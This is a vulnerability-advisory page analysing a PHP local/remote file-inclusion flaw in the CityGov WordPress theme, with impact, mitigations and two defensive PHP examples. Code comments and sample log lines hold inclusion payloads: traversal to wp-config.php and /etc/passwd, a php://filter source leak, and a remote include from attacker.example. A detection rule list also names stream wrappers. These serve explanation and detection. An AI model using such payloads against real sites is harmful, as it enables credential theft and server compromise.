CVE-2025-52815: CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') in AncoraThemes CityGov
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes CityGov allows PHP Local File Inclusion. This issue affects CityGov: from n/a through 1.9.
AI Analysis
Technical Summary
CVE-2025-52815 is a high-severity vulnerability classified under CWE-98, Improper Control of Filename for Include/Require Statement in PHP Program, the weakness behind both Remote File Inclusion (RFI) and Local File Inclusion (LFI). It affects the AncoraThemes CityGov theme in all versions up to and including 1.9 ("from n/a through 1.9" in the advisory). The flaw arises because the theme passes request-controlled input into a PHP include or require statement without restricting it to a fixed set of files, so an attacker can steer the include to files the developer never intended. The advisory describes the exploitable outcome as Local File Inclusion: on a default PHP configuration allow_url_include is off and remote URLs cannot be included, but an attacker can still traverse to any file the web server process can read and, with stream wrappers such as php://filter, read PHP source (for example a configuration file holding database credentials) instead of executing it. Escalating from LFI to code execution needs a second step, such as including a file the attacker has already placed or poisoned (an upload, a log file, a session file), which is the likely reason the vector carries high attack complexity. The CVSS v3.1 base score is 8.1 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H): network-reachable, no privileges or user interaction required, high impact on confidentiality, integrity and availability, and held below critical only by the attack complexity. No exploitation in the wild has been reported and no patch is linked at the time of this analysis. The CVE was assigned by Patchstack, which covers the WordPress ecosystem; CityGov is a WordPress theme marketed to municipal and government sites, so the exposed population is largely public-sector websites. A completed exploitation chain ends in server takeover, data theft, defacement, or a pivot into internal networks.
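As an added illustration of the CWE-98 pattern described above, not code from CityGov or AncoraThemes: the advisory does not publish the affected file or parameter, so the `tpl` parameter, the template map and the directory layout below are hypothetical. The script runs from the command line with `php`, creates a throwaway template directory under the system temp directory, and shows the vulnerable include pulling in a file outside that directory while the hardened resolver rejects the same traversal and a php:// wrapper:

```php
<?php
// Added example (not CityGov or AncoraThemes code). The advisory does not
// publish the affected parameter or file, so `tpl`, TEMPLATE_MAP and the
// template directory are hypothetical stand-ins for the general CWE-98 shape.
declare(strict_types=1);

// Vulnerable shape: the request string becomes the include path.
//   ?tpl=../../wp-config.php                                       -> LFI
//   ?tpl=php://filter/convert.base64-encode/resource=wp-config.php -> source leak
//   ?tpl=http://attacker.example/x.txt  (needs allow_url_include=On) -> RFI
function render_vulnerable(string $baseDir, string $tpl): string
{
    ob_start();
    include $baseDir . '/' . $tpl;   // CWE-98: the attacker controls the filename
    return (string) ob_get_clean();
}

// Hardened shape: an allow-list maps short tokens to fixed files, and the
// resolved path is checked to still sit inside the template directory.
const TEMPLATE_MAP = [
    'news'    => 'news.php',
    'events'  => 'events.php',
    'contact' => 'contact.php',
];

function resolve_template(string $baseDir, string $tpl): ?string
{
    // 1. Exact-match allow-list: nothing from the request reaches the path.
    if (!array_key_exists($tpl, TEMPLATE_MAP)) {
        return null;
    }
    // 2. Containment check as defence in depth (e.g. if the map were ever
    //    loaded from an editable option). realpath() collapses ".." and
    //    symlinks and returns false for stream wrappers and missing files.
    $root = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . TEMPLATE_MAP[$tpl]);
    if ($root === false || $path === false
        || strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $path;
}

function render_hardened(string $baseDir, string $tpl): string
{
    $path = resolve_template($baseDir, $tpl);
    if ($path === null) {
        throw new InvalidArgumentException("unknown template: $tpl");
    }
    ob_start();
    include $path;
    return (string) ob_get_clean();
}

// Self-contained demo: a throwaway template directory plus one file outside it.
$tmp = sys_get_temp_dir();
$dir = $tmp . '/cwe98-templates-' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents("$dir/news.php", '<?php echo "news template";');
$outside = $tmp . '/cwe98-outside-' . bin2hex(random_bytes(4)) . '.php';
file_put_contents($outside, '<?php echo "CONTENT FROM OUTSIDE THE THEME";');

$traversal = '../' . basename($outside);
printf("vulnerable, tpl=%s\n  -> %s\n", $traversal, render_vulnerable($dir, $traversal));

foreach (['news', $traversal, 'php://filter/resource=news.php'] as $tpl) {
    try {
        printf("hardened,   tpl=%s\n  -> %s\n", $tpl, render_hardened($dir, $tpl));
    } catch (InvalidArgumentException $e) {
        printf("hardened,   tpl=%s\n  -> rejected (%s)\n", $tpl, $e->getMessage());
    }
}

unlink("$dir/news.php");
rmdir($dir);
unlink($outside);
```

The allow-list is the actual fix; the realpath() containment check is defence in depth and, on its own, would still let a request choose any file inside the template directory. Note also that the traversal works in the vulnerable function with allow_url_include at its default Off, which is why "LFI" in the advisory is not a lesser finding than "RFI".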
Potential Impact
For European organizations, particularly local governments, municipalities and other public-sector bodies running the CityGov theme, the exposure is significant. A successful exploit can expose citizen data, disrupt online public services and undermine trust in government digital infrastructure. Given the high confidentiality, integrity and availability impacts, an attacker who completes the chain can alter published information, take the site offline, or use the server as a foothold for further attacks against connected systems. Because no privileges or user interaction are required, the flaw can be exploited unauthenticated and without luring anyone, so once a working request is known it can be scanned for across the whole population of affected sites. The European public sector is a recurring target for espionage and hacktivist campaigns, and defacement or data leakage from a municipal site serves both agendas. With no patch linked, the window of exposure is open-ended; the high attack complexity means exploitation is not a one-request affair, but it is well within reach of a competent attacker.
Mitigation Recommendations
Immediate mitigation steps include:
1) Inventory first: because no fixed version is linked, treat every install of CityGov at version 1.9 or earlier as affected. Check the theme version in the WordPress admin (Appearance, Themes) or with WP-CLI, and include staging and archived copies of the site.
2) Reduce exposure. Whole-site IP restriction is rarely an option for a public municipal website, but administrative paths can be restricted, and if CityGov is installed but not the active theme, delete it rather than leaving it deactivated: PHP files under wp-content/themes/ stay directly reachable from the web whether or not the theme is active.
3) Put a Web Application Firewall in front of the site with rules for the payload shapes an include injection needs: directory traversal sequences (including URL-encoded and double-encoded forms), PHP stream wrappers (php://, data://, expect://, phar://), full URLs inside parameter values, and null bytes. The affected parameter name is not published, so rules must key on the payload rather than on a parameter.
4) Confirm allow_url_include is Off in php.ini (it is the default and the directive is deprecated since PHP 7.4); this removes the remote-inclusion variant. Disabling allow_url_fopen is optional hardening that does not stop local inclusion and can break plugins that fetch remote resources through PHP stream functions, so test before deploying it.
5) Monitor web-server access logs for the same patterns as in 3), and the PHP error log for "failed to open stream" and "Failed opening ... for inclusion" warnings, which an attacker's probing of the include path produces before a working payload is found.
6) Run the web server under least privilege: the PHP process should not be able to write to the theme or plugin directories, wp-config.php should be readable only by that process, and an open_basedir restriction limited to the web root and temp directory narrows which files an include can reach at all.
7) Watch AncoraThemes' official channels and the Patchstack advisory for a fixed release and apply it promptly; until then, the controls above are compensating, not curative.
8) If you maintain customized copies of the theme, audit them for include, require, include_once and require_once calls whose argument is built from $_GET, $_POST, $_REQUEST or values derived from them, and for WordPress helpers that wrap include, such as get_template_part() and locate_template(), being passed request data. The fix in every case is an allow-list that maps a short token to a fixed file, never string concatenation of request input into a path.
These measures go beyond generic advice by focusing on configuration hardening, proactive detection, and code-level remediation specific to this class of vulnerability.
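To make the log-monitoring step concrete, an added triage script, not from the advisory or the vendor, that scans web-server access log lines for the payload shapes an include-injection attempt leaves behind. The log lines are constructed for the demo, and the rules key on the decoded payload rather than on a parameter name, since the affected parameter is not published:

```php
<?php
// Added example, not from the advisory or from AncoraThemes. The access-log
// lines below are constructed for the demo; the request paths and IPs are
// hypothetical and do not describe CityGov's actual vulnerable endpoint.
declare(strict_types=1);

const SAMPLE_LOG = <<<'LOG'
203.0.113.7 - - [27/Jun/2025:12:05:03 +0000] "GET /?page=news HTTP/1.1" 200 5120
203.0.113.7 - - [27/Jun/2025:12:05:09 +0000] "GET /wp-content/themes/citygov/x.php?tpl=../../../../wp-config.php HTTP/1.1" 200 2210
198.51.100.2 - - [27/Jun/2025:12:06:11 +0000] "GET /?tpl=php://filter/convert.base64-encode/resource=wp-config.php HTTP/1.1" 200 3300
198.51.100.2 - - [27/Jun/2025:12:06:40 +0000] "GET /?tpl=http://198.51.100.2/s.txt HTTP/1.1" 500 0
192.0.2.9 - - [27/Jun/2025:12:07:02 +0000] "GET /?tpl=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1800
192.0.2.9 - - [27/Jun/2025:12:07:30 +0000] "GET /contact/ HTTP/1.1" 200 4096
LOG;

// Each rule is a label and a PCRE pattern applied to the URL-decoded request target.
const LFI_RULES = [
    'traversal'      => '#\.\.[/\\\\]#',
    'php-wrapper'    => '#\b(php|phar|zip|glob|expect|data)://#i',
    'remote-url'     => '#=(https?|ftps?)://#i',
    'null-byte'      => '#\x00#',
    'sensitive-file' => '#(wp-config\.php|/etc/passwd|/proc/self/)#i',
];

/** Pull the request target out of an Apache/nginx combined-format log line. */
function request_target(string $line): ?string
{
    return preg_match('#"(?:GET|POST|HEAD) (\S+) HTTP/#', $line, $m) ? $m[1] : null;
}

/** Decode twice: attackers double-encode to slip past single-decode filters. */
function normalise(string $target): string
{
    return rawurldecode(rawurldecode($target));
}

/** Return the labels of every rule that fires on one line (empty = benign). */
function classify(string $line): array
{
    $target = request_target($line);
    if ($target === null) {
        return [];
    }
    $decoded = normalise($target);
    $hits = [];
    foreach (LFI_RULES as $label => $re) {
        if (preg_match($re, $decoded)) {
            $hits[] = $label;
        }
    }
    return $hits;
}

// Report every suspicious line with its source IP and the rules it tripped.
foreach (explode("\n", SAMPLE_LOG) as $line) {
    $hits = classify($line);
    if ($hits !== []) {
        printf("%-15s %s\n", substr($line, 0, (int) strpos($line, ' ')), implode(',', $hits));
        printf("    %s\n", normalise((string) request_target($line)));
    }
}
```

Running it with `php` prints the four offending lines with the rules they tripped and the decoded request; the two benign lines produce nothing. The remote-url rule will also flag legitimate redirect or callback parameters that carry full URLs, so tune it to the site's parameter names before alerting on it. The same decoded-payload patterns are a reasonable starting point for the WAF rules in step 3.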
Affected Countries
Germany, France, Italy, Spain, Poland, Netherlands, Belgium, Sweden, Austria, Denmark
Technical Details
- Data Version: 5.1
- Assigner Short Name: Patchstack
- Date Reserved: 2025-06-19T10:03:36.791Z
- Cvss Version: 3.1
- State: PUBLISHED
Threat ID: 685e88efca1063fb875de545
Added to database: 6/27/2025, 12:05:03 PM
Last enriched: 6/27/2025, 12:22:00 PM
Last updated: 1/7/2026, 8:57:50 AM
Related Threats
- CVE-2025-15158: CWE-434 Unrestricted Upload of File with Dangerous Type in eastsidecode WP Enable WebP (High)
- CVE-2025-15018: CWE-639 Authorization Bypass Through User-Controlled Key in djanym Optional Email (Critical)
- CVE-2025-15000: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in tfrommen Page Keys (Medium)
- CVE-2025-14999: CWE-352 Cross-Site Request Forgery (CSRF) in kentothemes Latest Tabs (Medium)
- CVE-2025-13531: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in hayyatapps Stylish Order Form Builder (Medium)